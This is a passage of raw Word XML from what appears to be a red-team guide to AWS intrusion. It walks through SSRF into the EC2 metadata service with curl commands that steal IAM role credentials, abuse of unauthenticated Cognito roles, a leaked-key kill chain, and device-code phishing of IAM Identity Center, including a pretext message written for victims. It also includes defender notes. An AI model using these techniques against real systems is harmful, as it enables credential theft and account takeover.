          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>","SecretKey":"...","SessionToken":"...","Expiration":"..."}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78719DE0"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operator@kali:~/ios$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sts get-caller-identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C29E1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{"UserId":"AROAEXAMPLE...:CognitoIdentityCredentials","Arn":"arn:aws:sts::444455556666:assumed-role/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Acme_Mobile_Unauth_Role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/CognitoIdentityCredentials"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A380B8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unauthenticated Cognito role's permissions dictate what you can do next. It is often surprisingly over-permissive — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on "user upload" buckets, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dynamodb:Query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on an "app" table, even </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:InvokeFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a named function that performs its own authorization. Every one of those is an exploit pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E5FAE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.4  SSRF into IMDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F496DF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Instance Metadata Service at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>http://169.254.169.254/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on every EC2 instance returns the session credentials for the instance's attached IAM role. If you can make the EC2 instance fetch an arbitrary URL — through an HTTP-client library's misuse, a PDF renderer that fetches images, a webhook handler that takes a URL parameter, an image-proxy endpoint — you have SSRF. SSRF into IMDS returns the role's session credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BF804"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curl -s "https://webapp.acme.example/image-proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19368B25"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EC2-App-InstanceRole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84CE2D"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curl -s "https://webapp.acme.example/image-proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2-App-InstanceRole"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE675F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3D48EBA9"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"Code" : "Success",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185855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"LastUpdated" : "2026-03-14T02:14:33Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59375D"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"Type" : "AWS-HMAC",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADE60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"AccessKeyId" : "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIAEXAMPLEIMDSEXFIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F061E"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r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"SecretAccessKey" : "wJalrEXAMPLE...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A89B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"Token" : "FwoGZXIvYXdzE...==",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102CD29"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"Expiration" : "2026-03-14T08:14:33Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73856BE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60890D6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returned ASIA key pair is short-lived (up to six hours) and carries the permissions of the instance's role. Import it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws configure --profile &lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>set_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and proceed with Chapter 5's enumeration flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D400C3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IMDSv2 bypass landscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DF23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IMDSv2, the token-based replacement for IMDSv1, requires a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/latest/api/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>X-aws-ec2-metadata-token-ttl-seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain a session token, then a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with that token in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>X-aws-ec2-metadata-token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. SSRF primitives that can only emit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests cannot directly reach IMDSv2. But:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2C6E3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Many real-world SSRF primitives support arbitrary methods, headers, and bodies (webhook fetchers, RPC-style endpoints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428492D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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hop-count header (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-style behavior) for IMDSv2 defaults to 1, which blocks containerized SSRF on Fargate but not on classic EC2 userland.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301E133" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Instances launched before the IMDSv2-default rollout (mid-2023 for new AMIs) may still accept IMDSv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2960FB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Tag-based enforcement (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:MetadataHttpTokens=required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) is customer-configured per-instance — plenty of production fleets still have mixed mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A55FA"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Dev leaks key to GitHu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>b</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commit 3f7a1b2, not reverte</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trufflehog finds i</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verified live in 180 m</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Operator imports ke</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~/.aws/credentials profil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Enumerate (Ch.5</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CloudFox + Pac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>u</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Key is a CI/CD deploy key with iam:PassRole + lambda:CreateFunction (Ch.8 privesc path</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Operator escalates to Administrator-equivalent role in &lt; 10 min from findin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>g</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Defender detection: (1) trufflehog pre-commit hooks (2) GuardDuty 'UnauthorizedAPICall' + 'AnomalousLocation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(3) GitHub Secret Scanning + AWS key revoke webhook (4) IAM access-analyzer unused-keys repor</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Time from leak → impact: typically under 4 hours on a continuously monitored GitHub org. Operator window is narrow</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Credential-leak kill chain. The compression of time between leak and exploit has tightened every year; 2026 operators routinely see keys revoked by AWS's own scanning within 15 minutes of a public commit. Speed and private-repo pivots matter</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404114AA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.5  Phishing federated console users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2841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substantial fraction of AWS compromises in 2025 came from phishing — not of the target directly, but of their IdP. Okta, Entra ID, and Google Workspace are the identity layer; an IdP compromise issues a SAML assertion or OIDC token that federates cleanly into AWS. The red-team versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10533BE2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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IdP credential phishing + MFA bypass.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Classic evilginx2-style AiTM proxy against the IdP's login page. Post-MFA, the captured session cookie grants access for its TTL. From there, any SAML app federated off the IdP is reachable, AWS included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CFD6E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Device-code flow abuse against IAM Identity Center.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identity Center supports device-code flow for the AWS CLI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws configure sso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>). An attacker initiates the flow, sends the eight-character code to the victim framed as an IT request, and once the victim approves, the attacker's host walks into every permission set the victim has.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0344DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Consent phishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An OAuth app the victim consents to in Entra ID can request delegated permissions that include federated AWS role assumption. The victim sees a small consent prompt; the attacker gains persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175E5A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operator@c2:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws sso login --profile target-poc --no-browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8B5F9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Attempting to automatically open the SSO authorization page in your default browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A69FE2E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>If the browser does not open or you wish to use a different device to authorize this request, open the following URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48F3B1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB9A3FE"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https://acme.awsapps.com/start/#/device?user_code=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w10"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DNFG-QVPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5272F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144CFCBC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Then enter the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688876C9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5641E997" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w10"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DNFG-QVPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB2743" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># operator sends DNFG-QVPM to victim with pretext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E1445" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># "IT is rotating the SSO CA.  Please approve the code above when prompted.  Thanks!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CA097"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victim clicks through.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator's CLI completes sign-in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C198EB4"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Successfully signed in to Account 555566667777 / AcmePlatformAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B848508" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="911888309"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DEFENDER NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F03E47" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="911888309"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Device-code phishing is detectable: Identity Center emits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AuthorizeRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> events whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
